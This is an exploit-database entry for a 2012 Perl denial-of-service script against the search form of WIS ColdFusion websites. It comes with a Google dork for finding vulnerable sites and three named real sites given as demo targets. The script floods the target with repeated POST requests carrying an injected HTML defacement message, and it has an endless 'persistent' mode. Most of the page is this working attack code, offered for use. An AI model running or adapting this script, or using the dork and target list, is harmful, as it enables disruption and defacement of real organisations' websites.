Vulners
Lucene search
# Exploit Title: [WIS Coldfusion Exploit]
# Date: [9-9-2012]
# Author: [Noxxie]
# Vendor or Software Link: [ http://www.wis.nl/Onze_klanten ] (link that also shows customers , gives an idea of inpact)
# Version: [All versions with search form are affected]
# Category:: [remote dos]
# Google dork: [inurl:/Page/Nctrue]
# Tested on: [linux,windows]
# Demo site: [ http://www.cambium.org/Page/nctrue/sp81/index.html?Search=hello
http://www.teylingen-college.nl/Page/nctrue/sp2048/Index.html
http://copernicus.atlascollege.nl/Page/nctrue/action=search/index.html
#!/usr/bin/perl -w
#!/Made By Noxxie Version for Hackflag
use Time::HiRes;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
system("cls");
if ($#ARGV != 3) {
print "usage: target interval repetitions Persistent\n";
print "target: link to vulnerable page\n";
print "interval: interval time in seconds\n";
print "repetitions: amount of repetitions\n";
print "Persistent mode (0=off,1=on)\n";
print "example: http://www.google.nl/vulnerablepage.php 2 1 1\n";
exit;
}
$target = $ARGV[0];
$seconds = $ARGV[1];
$times = $ARGV[2];
$persistent = $ARGV[3];
$count = 0;
$togo =0;
print " ## ## ####### ## ## ## ## #### ######## \n ### ## ## ## ## ## ## ## ## ## \n #### ## ## ## ## ## ## ## ## ## \n ## ## ## ## ## ### ### ## ###### \n ## #### ## ## ## ## ## ## ## ## \n ## ### ## ## ## ## ## ## ## ## \n ## ## ####### ## ## ## ## #### ######## \n ";
print"Loading\n";
Time::HiRes::sleep(0.3);
print"Target: $target\n";
Time::HiRes::sleep(0.2);
print"Target Set\n\n";
Time::HiRes::sleep(0.3);
print"Interval: $seconds Seconds\n";
Time::HiRes::sleep(0.1);
print"Interval Set\n\n";
Time::HiRes::sleep(0.2);
print"Amount: $times Times\n";
Time::HiRes::sleep(0.4);
print"Amount Set\n\n";
if ($persistent == 1) {
print "Persistent mode is ON\n";
print "Use Cntrl+C to abort script\n"
}else{
print "Persistent mode is OFF\n";
print "Script will exit automaticly after task is completed\n"
}
Time::HiRes::sleep(0.1);
Proceed:
$count = $count + 1;
if( $count > $times ){
system("cls");
print "\n\n\n Job Well Done\n+----------Stats---------+\nTarget: $target\nExploited $times times\nwith an interval of : $seconds seconds\n\n See You laters :D\n\n\n\n";
Time::HiRes::sleep(3.5);
exit;
}else{
goto Flop;
}
Flop:
$togo = $times - $count;
$ua = LWP::UserAgent->new;
my $req = POST $target,
[ search => '<html><head></head><body><h1>Sites die hun content niet goed beveiligen worden gepowened door een stelletje whitehats</h1><br><p><h1>[[/]{{/True Story/}}[/]]</h1></body></html>', errors => 0 ];
print $ua->request($req)->as_string;
Time::HiRes::sleep($seconds);
if ($persistent != 1) {
print "$count Done , $togo times to go \n";
print "\n";
}
if ($persistent == 1) {
goto Flop;
}
goto Proceed;
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2012 00:00Current
7High risk
Vulners AI Score7